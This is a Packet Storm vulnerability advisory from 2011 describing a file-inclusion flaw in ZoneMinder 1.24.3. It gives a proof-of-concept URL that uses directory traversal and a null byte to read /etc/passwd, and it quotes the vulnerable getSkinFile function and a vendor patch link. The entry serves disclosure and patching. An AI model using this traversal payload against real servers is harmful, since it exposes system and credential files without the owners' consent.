ZoneMinder 1.24.3 Remote File Inclusion

2011-08-02T00:00:00
ID PACKETSTORM:103634
Type packetstorm
Reporter Iye
Modified 2011-08-02T00:00:00

Description

                                        
                                            `# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability  
# Date: 2011-07-22  
# Author: Iye (iye[dot]cba-at-gmail[dot]com)  
# Software Link: http://www.zoneminder.com/  
# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested  
# Tested on: Ubuntu 10.04  
  
You must be authenticated as a user in the Web App to exploit it. It's  
not a must to be admin.  
  
POC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00  
  
Reported to proyect mantainer (Philip Coombes) on 2011-07-22  
Fix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt  
  
Vulnerable Code:  
  
/var/www/zm/includes/functions.php  
--------------------------------------------------------  
  
function getSkinFile( $file )  
{  
global $skinBase;  
$skinFile = false;  
foreach ( $skinBase as $skin )  
{  
$tempSkinFile = 'skins'.'/'.$skin.'/'.$file;  
if ( file_exists( $tempSkinFile ) )  
$skinFile = $tempSkinFile;  
}  
return( $skinFile );  
}  
  
--------------------------------------------------------  
  
`